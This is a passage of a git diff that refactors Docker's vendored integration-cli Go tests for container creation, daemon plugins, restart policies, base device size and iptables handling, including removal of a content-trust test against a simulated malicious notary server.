* 365 * 11) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try create - createCmd := exec.Command(dockerBinary, "create", repoName) - s.trustedCmd(createCmd) - out, _, err := runCommandWithOutput(createCmd) - c.Assert(err, check.Not(check.IsNil)) - c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out)) - }) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try create - createCmd := exec.Command(dockerBinary, "create", "--disable-content-trust", repoName) - s.trustedCmd(createCmd) - out, _, err := runCommandWithOutput(createCmd) - c.Assert(err, check.Not(check.IsNil)) - c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out)) - - }) -} - -func (s *DockerTrustSuite) TestTrustedCreateFromBadTrustServer(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclievilcreate/trusted:latest", privateRegistryURL) - evilLocalConfigDir, err := ioutil.TempDir("", "evilcreate-local-config-dir") - c.Assert(err, check.IsNil) - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - dockerCmd(c, "rmi", repoName) - - // Try create - createCmd := exec.Command(dockerBinary, "create", repoName) - s.trustedCmd(createCmd) - out, _, err = runCommandWithOutput(createCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - dockerCmd(c, "rmi", repoName) - - // Kill the notary server, start a new "evil" one. - s.not.Close() - s.not, err = newTestNotary(c) - c.Assert(err, check.IsNil) - - // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. - // tag an image and upload it to the private registry - dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) - - // Push up to the new server - pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - // Now, try creating with the original client from this new trust server. This should fail because the new root is invalid. - createCmd = exec.Command(dockerBinary, "create", repoName) - s.trustedCmd(createCmd) - out, _, err = runCommandWithOutput(createCmd) - if err == nil { - c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) - } - if !strings.Contains(out, "could not rotate trust to a new trusted root") { - c.Fatalf("Missing expected output on trusted create:\n%s", out) - } - -} - func (s *DockerSuite) TestCreateStopSignal(c *check.C) { name := "test_create_stop_signal" dockerCmd(c, "create", "--name", name, "--stop-signal", "9", "busybox") @@ -446,7 +307,7 @@ func (s *DockerSuite) TestCreateWithWorkdir(c *check.C) { dockerCmd(c, "create", "--name", name, "-w", dir, "busybox") // Windows does not create the workdir until the container is started - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { dockerCmd(c, "start", name) } dockerCmd(c, "cp", fmt.Sprintf("%s:%s", name, dir), prefix+slash+"tmp") @@ -479,21 +340,21 @@ RUN chmod 755 /entrypoint.sh ENTRYPOINT ["/entrypoint.sh"] CMD echo foobar` - ctx, err := fakeContext(dockerfile, map[string]string{ - "entrypoint.sh": `#!/bin/sh + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "entrypoint.sh": `#!/bin/sh echo "I am an entrypoint" exec "$@"`, - }) - c.Assert(err, check.IsNil) + })) defer ctx.Close() - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, check.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - out, _ := dockerCmd(c, "create", "--entrypoint=", name, "echo", "foo") + out := cli.DockerCmd(c, "create", "--entrypoint=", name, "echo", "foo").Combined() id := strings.TrimSpace(out) c.Assert(id, check.Not(check.Equals), "") - out, _ = dockerCmd(c, "start", "-a", id) + out = cli.DockerCmd(c, "start", "-a", id).Combined() c.Assert(strings.TrimSpace(out), check.Equals, "foo") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go index f91edc6555..69e190c30d 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go @@ -3,24 +3,20 @@ package main import ( - "os" - "os/exec" - "path/filepath" "strings" - "syscall" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/pkg/mount" "github.com/go-check/check" + "golang.org/x/sys/unix" + "gotest.tools/icmd" ) // TestDaemonRestartWithPluginEnabled tests state restore for an enabled plugin func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) { testRequires(c, IsAmd64, Network) - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c) if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) @@ -35,9 +31,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) { } }() - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) out, err := s.d.Cmd("plugin", "ls") if err != nil { @@ -51,9 +45,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) { func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) { testRequires(c, IsAmd64, Network) - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c) if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName, "--disable"); err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) @@ -65,9 +57,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) { } }() - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) out, err := s.d.Cmd("plugin", "ls") if err != nil { @@ -82,16 +72,12 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) { func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) { testRequires(c, IsAmd64, Network) - if err := s.d.Start("--live-restore"); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c, "--live-restore") if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) } defer func() { - if err := s.d.Restart("--live-restore"); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c, "--live-restore") if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { c.Fatalf("Could not disable plugin: %v %s", err, out) } @@ -104,10 +90,7 @@ func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) { c.Fatalf("Could not kill daemon: %v", err) } - cmd := exec.Command("pgrep", "-f", pluginProcessName) - if out, ec, err := runCommandWithOutput(cmd); ec != 0 { - c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out) - } + icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success) } // TestDaemonShutdownLiveRestoreWithPlugins SIGTERMs daemon started with --live-restore. @@ -115,16 +98,12 @@ func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) { func (s *DockerDaemonSuite) TestDaemonShutdownLiveRestoreWithPlugins(c *check.C) { testRequires(c, IsAmd64, Network) - if err := s.d.Start("--live-restore"); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c, "--live-restore") if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) } defer func() { - if err := s.d.Restart("--live-restore"); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c, "--live-restore") if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { c.Fatalf("Could not disable plugin: %v %s", err, out) } @@ -133,31 +112,24 @@ func (s *DockerDaemonSuite) TestDaemonShutdownLiveRestoreWithPlugins(c *check.C) } }() - if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil { + if err := s.d.Interrupt(); err != nil { c.Fatalf("Could not kill daemon: %v", err) } - cmd := exec.Command("pgrep", "-f", pluginProcessName) - if out, ec, err := runCommandWithOutput(cmd); ec != 0 { - c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out) - } + icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success) } // TestDaemonShutdownWithPlugins shuts down running plugins. func (s *DockerDaemonSuite) TestDaemonShutdownWithPlugins(c *check.C) { testRequires(c, IsAmd64, Network, SameHostDaemon) - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c) if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) } defer func() { - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { c.Fatalf("Could not disable plugin: %v %s", err, out) } @@ -166,25 +138,50 @@ func (s *DockerDaemonSuite) TestDaemonShutdownWithPlugins(c *check.C) { } }() - if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil { + if err := s.d.Interrupt(); err != nil { c.Fatalf("Could not kill daemon: %v", err) } for { - if err := syscall.Kill(s.d.cmd.Process.Pid, 0); err == syscall.ESRCH { + if err := unix.Kill(s.d.Pid(), 0); err == unix.ESRCH { break } } - cmd := exec.Command("pgrep", "-f", pluginProcessName) - if out, ec, err := runCommandWithOutput(cmd); ec != 1 { - c.Fatalf("Expected exit code '1', got %d err: %v output: %s ", ec, err, out) + icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + }) + + s.d.Start(c) + icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success) +} + +// TestDaemonKillWithPlugins leaves plugins running. +func (s *DockerDaemonSuite) TestDaemonKillWithPlugins(c *check.C) { + testRequires(c, IsAmd64, Network, SameHostDaemon) + + s.d.Start(c) + if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { + c.Fatalf("Could not install plugin: %v %s", err, out) } - s.d.Start("--live-restore") - cmd = exec.Command("pgrep", "-f", pluginProcessName) - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil, check.Commentf(out)) + defer func() { + s.d.Restart(c) + if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { + c.Fatalf("Could not disable plugin: %v %s", err, out) + } + if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + if err := s.d.Kill(); err != nil { + c.Fatalf("Could not kill daemon: %v", err) + } + + // assert that plugins are running. + icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success) } // TestVolumePlugin tests volume creation using a plugin. @@ -195,19 +192,11 @@ func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) { destDir := "/tmp/data/" destFile := "foo" - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c) out, err := s.d.Cmd("plugin", "install", pName, "--grant-all-permissions") if err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) } - pluginID, err := s.d.Cmd("plugin", "inspect", "-f", "{{.Id}}", pName) - pluginID = strings.TrimSpace(pluginID) - if err != nil { - c.Fatalf("Could not retrieve plugin ID: %v %s", err, pluginID) - } - mountpointPrefix := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs") defer func() { if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { c.Fatalf("Could not disable plugin: %v %s", err, out) @@ -216,11 +205,6 @@ func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) { if out, err := s.d.Cmd("plugin", "remove", pName); err != nil { c.Fatalf("Could not remove plugin: %v %s", err, out) } - - exists, err := existsMountpointWithPrefix(mountpointPrefix) - c.Assert(err, checker.IsNil) - c.Assert(exists, checker.Equals, false) - }() out, err = s.d.Cmd("volume", "create", "-d", pName, volName) @@ -240,45 +224,17 @@ func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) { c.Assert(out, checker.Contains, volName) c.Assert(out, checker.Contains, pName) - mountPoint, err := s.d.Cmd("volume", "inspect", volName, "--format", "{{.Mountpoint}}") - if err != nil { - c.Fatalf("Could not inspect volume: %v %s", err, mountPoint) - } - mountPoint = strings.TrimSpace(mountPoint) - out, err = s.d.Cmd("run", "--rm", "-v", volName+":"+destDir, "busybox", "touch", destDir+destFile) c.Assert(err, checker.IsNil, check.Commentf(out)) - path := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs", mountPoint, destFile) - _, err = os.Lstat(path) - c.Assert(err, checker.IsNil) - exists, err := existsMountpointWithPrefix(mountpointPrefix) - c.Assert(err, checker.IsNil) - c.Assert(exists, checker.Equals, true) -} - -func (s *DockerDaemonSuite) TestGraphdriverPlugin(c *check.C) { - testRequires(c, Network, IsAmd64, DaemonIsLinux, overlay2Supported, ExperimentalDaemon) - - s.d.Start() - - // install the plugin - plugin := "cpuguy83/docker-overlay2-graphdriver-plugin" - out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", plugin) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - // restart the daemon with the plugin set as the storage driver - s.d.Restart("-s", plugin, "--storage-opt", "overlay2.override_kernel_check=1") - - // run a container - out, err = s.d.Cmd("run", "--rm", "busybox", "true") // this will pull busybox using the plugin + out, err = s.d.Cmd("run", "--rm", "-v", volName+":"+destDir, "busybox", "ls", destDir+destFile) c.Assert(err, checker.IsNil, check.Commentf(out)) } func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) { testRequires(c, DaemonIsLinux, Network, IsAmd64) - s.d.Start("--live-restore=true") + s.d.Start(c, "--live-restore=true") out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName) c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -287,7 +243,7 @@ func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) { out, err = s.d.Cmd("volume", "create", "--driver", pName, "test") c.Assert(err, checker.IsNil, check.Commentf(out)) - s.d.Restart("--live-restore=true") + s.d.Restart(c, "--live-restore=true") out, err = s.d.Cmd("plugin", "disable", pName) c.Assert(err, checker.NotNil, check.Commentf(out)) @@ -304,7 +260,7 @@ func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) { } func existsMountpointWithPrefix(mountpointPrefix string) (bool, error) { - mounts, err := mount.GetMounts() + mounts, err := mount.GetMounts(nil) if err != nil { return false, err } @@ -315,3 +271,58 @@ func existsMountpointWithPrefix(mountpointPrefix string) (bool, error) { } return false, nil } + +func (s *DockerDaemonSuite) TestPluginListFilterEnabled(c *check.C) { + testRequires(c, IsAmd64, Network) + + s.d.Start(c) + + out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pNameWithTag, "--disable") + c.Assert(err, check.IsNil, check.Commentf(out)) + + defer func() { + if out, err := s.d.Cmd("plugin", "remove", pNameWithTag); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + out, err = s.d.Cmd("plugin", "ls", "--filter", "enabled=true") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), pName) + + out, err = s.d.Cmd("plugin", "ls", "--filter", "enabled=false") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) + c.Assert(out, checker.Contains, "false") + + out, err = s.d.Cmd("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) +} + +func (s *DockerDaemonSuite) TestPluginListFilterCapability(c *check.C) { + testRequires(c, IsAmd64, Network) + + s.d.Start(c) + + out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pNameWithTag, "--disable") + c.Assert(err, check.IsNil, check.Commentf(out)) + + defer func() { + if out, err := s.d.Cmd("plugin", "remove", pNameWithTag); err != nil { + c.Fatalf("Could not remove plugin: %v %s", err, out) + } + }() + + out, err = s.d.Cmd("plugin", "ls", "--filter", "capability=volumedriver") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) + + out, err = s.d.Cmd("plugin", "ls", "--filter", "capability=authz") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), pName) + + out, err = s.d.Cmd("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pName) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go index 3a74fe215f..d2ff9606e5 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go @@ -5,6 +5,9 @@ package main import ( "bufio" "bytes" + "context" + "crypto/tls" + "crypto/x509" "encoding/json" "fmt" "io" @@ -18,18 +21,27 @@ import ( "strconv" "strings" "sync" - "syscall" "time" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/cloudflare/cfssl/helpers" + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + moby_daemon "github.com/docker/docker/daemon" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/opts" "github.com/docker/docker/pkg/mount" - "github.com/docker/docker/pkg/stringid" "github.com/docker/go-units" "github.com/docker/libnetwork/iptables" "github.com/docker/libtrust" "github.com/go-check/check" "github.com/kr/pty" + "golang.org/x/sys/unix" + "gotest.tools/icmd" ) // TestLegacyDaemonCommand test starting docker daemon using "deprecated" docker daemon @@ -37,31 +49,29 @@ import ( func (s *DockerDaemonSuite) TestLegacyDaemonCommand(c *check.C) { cmd := exec.Command(dockerBinary, "daemon", "--storage-driver=vfs", "--debug") err := cmd.Start() + go cmd.Wait() c.Assert(err, checker.IsNil, check.Commentf("could not start daemon using 'docker daemon'")) c.Assert(cmd.Process.Kill(), checker.IsNil) } func (s *DockerDaemonSuite) TestDaemonRestartWithRunningContainersPorts(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c) - if out, err := s.d.Cmd("run", "-d", "--name", "top1", "-p", "1234:80", "--restart", "always", "busybox:latest", "top"); err != nil { - c.Fatalf("Could not run top1: err=%v\n%s", err, out) - } - // --restart=no by default - if out, err := s.d.Cmd("run", "-d", "--name", "top2", "-p", "80", "busybox:latest", "top"); err != nil { - c.Fatalf("Could not run top2: err=%v\n%s", err, out) - } + cli.Docker( + cli.Args("run", "-d", "--name", "top1", "-p", "1234:80", "--restart", "always", "busybox:latest", "top"), + cli.Daemon(s.d), + ).Assert(c, icmd.Success) + + cli.Docker( + cli.Args("run", "-d", "--name", "top2", "-p", "80", "busybox:latest", "top"), + cli.Daemon(s.d), + ).Assert(c, icmd.Success) testRun := func(m map[string]bool, prefix string) { var format string for cont, shouldRun := range m { - out, err := s.d.Cmd("ps") - if err != nil { - c.Fatalf("Could not run ps: err=%v\n%q", err, out) - } + out := cli.Docker(cli.Args("ps"), cli.Daemon(s.d)).Assert(c, icmd.Success).Combined() if shouldRun { format = "%scontainer %q is not running" } else { @@ -75,27 +85,21 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithRunningContainersPorts(c *check testRun(map[string]bool{"top1": true, "top2": true}, "") - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ") } func (s *DockerDaemonSuite) TestDaemonRestartWithVolumesRefs(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatal(err) - } + s.d.StartWithBusybox(c) if out, err := s.d.Cmd("run", "--name", "volrestarttest1", "-v", "/foo", "busybox"); err != nil { c.Fatal(err, out) } - if err := s.d.Restart(); err != nil { - c.Fatal(err) - } + s.d.Restart(c) - if _, err := s.d.Cmd("run", "-d", "--volumes-from", "volrestarttest1", "--name", "volrestarttest2", "busybox", "top"); err != nil { - c.Fatal(err) + if out, err := s.d.Cmd("run", "-d", "--volumes-from", "volrestarttest1", "--name", "volrestarttest2", "busybox", "top"); err != nil { + c.Fatal(err, out) } if out, err := s.d.Cmd("rm", "-fv", "volrestarttest2"); err != nil { @@ -112,8 +116,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithVolumesRefs(c *check.C) { // #11008 func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--name", "top1", "--restart", "always", "busybox:latest", "top") c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out)) @@ -147,8 +150,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) { // both stopped testRun(map[string]bool{"top1": false, "top2": false}, "") - err = s.d.Restart() - c.Assert(err, check.IsNil) + s.d.Restart(c) // restart=always running testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ") @@ -156,8 +158,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) { out, err = s.d.Cmd("start", "top2") c.Assert(err, check.IsNil, check.Commentf("start top2: %v", out)) - err = s.d.Restart() - c.Assert(err, check.IsNil) + s.d.Restart(c) // both running testRun(map[string]bool{"top1": true, "top2": true}, "After second daemon restart: ") @@ -165,14 +166,13 @@ func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--name", "test1", "--restart", "on-failure:3", "busybox:latest", "false") c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out)) // wait test1 to stop - hostArgs := []string{"--host", s.d.sock()} + hostArgs := []string{"--host", s.d.Sock()} err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 10*time.Second, hostArgs...) c.Assert(err, checker.IsNil, check.Commentf("test1 should exit but not")) @@ -181,8 +181,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) lastStartTime := out - err = s.d.Restart() - c.Assert(err, check.IsNil) + s.d.Restart(c) // test1 shouldn't restart at all err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 0, hostArgs...) @@ -196,32 +195,35 @@ func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonStartIptablesFalse(c *check.C) { - if err := s.d.Start("--iptables=false"); err != nil { - c.Fatalf("we should have been able to start the daemon with passing iptables=false: %v", err) - } + s.d.Start(c, "--iptables=false") } // Make sure we cannot shrink base device at daemon restart. func (s *DockerDaemonSuite) TestDaemonRestartWithInvalidBasesize(c *check.C) { testRequires(c, Devicemapper) - c.Assert(s.d.Start(), check.IsNil) + s.d.Start(c) - oldBasesizeBytes := s.d.getBaseDeviceSize(c) + oldBasesizeBytes := getBaseDeviceSize(c, s.d) var newBasesizeBytes int64 = 1073741824 //1GB in bytes if newBasesizeBytes < oldBasesizeBytes { - err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) - c.Assert(err, check.IsNil, check.Commentf("daemon should not have started as new base device size is less than existing base device size: %v", err)) + err := s.d.RestartWithError("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) + c.Assert(err, check.NotNil, check.Commentf("daemon should not have started as new base device size is less than existing base device size: %v", err)) + // 'err != nil' is expected behaviour, no new daemon started, + // so no need to stop daemon. + if err != nil { + return + } } - c.Assert(s.d.Stop(), check.IsNil) + s.d.Stop(c) } // Make sure we can grow base device at daemon restart. func (s *DockerDaemonSuite) TestDaemonRestartWithIncreasedBasesize(c *check.C) { testRequires(c, Devicemapper) - c.Assert(s.d.Start(), check.IsNil) + s.d.Start(c) - oldBasesizeBytes := s.d.getBaseDeviceSize(c) + oldBasesizeBytes := getBaseDeviceSize(c, s.d) var newBasesizeBytes int64 = 53687091200 //50GB in bytes @@ -229,14 +231,42 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithIncreasedBasesize(c *check.C) { c.Skip(fmt.Sprintf("New base device size (%v) must be greater than (%s)", units.HumanSize(float64(newBasesizeBytes)), units.HumanSize(float64(oldBasesizeBytes)))) } - err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) + err := s.d.RestartWithError("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes)) c.Assert(err, check.IsNil, check.Commentf("we should have been able to start the daemon with increased base device size: %v", err)) - basesizeAfterRestart := s.d.getBaseDeviceSize(c) + basesizeAfterRestart := getBaseDeviceSize(c, s.d) newBasesize, err := convertBasesize(newBasesizeBytes) c.Assert(err, check.IsNil, check.Commentf("Error in converting base device size: %v", err)) c.Assert(newBasesize, check.Equals, basesizeAfterRestart, check.Commentf("Basesize passed is not equal to Basesize set")) - c.Assert(s.d.Stop(), check.IsNil) + s.d.Stop(c) +} + +func getBaseDeviceSize(c *check.C, d *daemon.Daemon) int64 { + info := d.Info(c) + for _, statusLine := range info.DriverStatus { + key, value := statusLine[0], statusLine[1] + if key == "Base Device Size" { + return parseDeviceSize(c, value) + } + } + c.Fatal("failed to parse Base Device Size from info") + return int64(0) +} + +func parseDeviceSize(c *check.C, raw string) int64 { + size, err := units.RAMInBytes(strings.TrimSpace(raw)) + c.Assert(err, check.IsNil) + return size +} + +func convertBasesize(basesizeBytes int64) (int64, error) { + basesize := units.HumanSize(float64(basesizeBytes)) + basesize = strings.Trim(basesize, " ")[:len(basesize)-3] + basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64) + if err != nil { + return 0, err + } + return int64(basesizeFloat) * 1024 * 1024 * 1024, nil } // Issue #8444: If docker0 bridge is modified (intentionally or unintentionally) and @@ -246,67 +276,38 @@ func (s *DockerDaemonSuite) TestDaemonStartBridgeWithoutIPAssociation(c *check.C // rather than depending on brctl commands to verify docker0 is created and up // let's start the daemon and stop it, and then make a modification to run the // actual test - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } - if err := s.d.Stop(); err != nil { - c.Fatalf("Could not stop daemon: %v", err) - } + s.d.Start(c) + s.d.Stop(c) // now we will remove the ip from docker0 and then try starting the daemon - ipCmd := exec.Command("ip", "addr", "flush", "dev", "docker0") - stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd) - if err != nil { - c.Fatalf("failed to remove docker0 IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr) - } + icmd.RunCommand("ip", "addr", "flush", "dev", "docker0").Assert(c, icmd.Success) - if err := s.d.Start(); err != nil { + if err := s.d.StartWithError(); err != nil { warning := "**WARNING: Docker bridge network in bad state--delete docker0 bridge interface to fix" c.Fatalf("Could not start daemon when docker0 has no IP address: %v\n%s", err, warning) } } func (s *DockerDaemonSuite) TestDaemonIptablesClean(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c) if out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top"); err != nil { c.Fatalf("Could not run top: %s, %v", out, err) } - // get output from iptables with container running ipTablesSearchString := "tcp dpt:80" - ipTablesCmd := exec.Command("iptables", "-nvL") - out, _, err := runCommandWithOutput(ipTablesCmd) - if err != nil { - c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) - } - if !strings.Contains(out, ipTablesSearchString) { - c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out) - } + // get output from iptables with container running + verifyIPTablesContains(c, ipTablesSearchString) - if err := s.d.Stop(); err != nil { - c.Fatalf("Could not stop daemon: %v", err) - } + s.d.Stop(c) // get output from iptables after restart - ipTablesCmd = exec.Command("iptables", "-nvL") - out, _, err = runCommandWithOutput(ipTablesCmd) - if err != nil { - c.Fatalf("Could not run iptables -nvL: %s, %v", out, err) - } - - if strings.Contains(out, ipTablesSearchString) { - c.Fatalf("iptables output should not have contained %q, but was %q", ipTablesSearchString, out) - } + verifyIPTablesDoesNotContains(c, ipTablesSearchString) } func (s *DockerDaemonSuite) TestDaemonIptablesCreate(c *check.C) { - if err := s.d.StartWithBusybox(); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } + s.d.StartWithBusybox(c) if out, err := s.d.Cmd("run", "-d", "--name", "top", "--restart=always", "-p", "80", "busybox:latest", "top"); err != nil { c.Fatalf("Could not run top: %s, %v", out, err) @@ -314,38 +315,36 @@ func (s *DockerDaemonSuite) 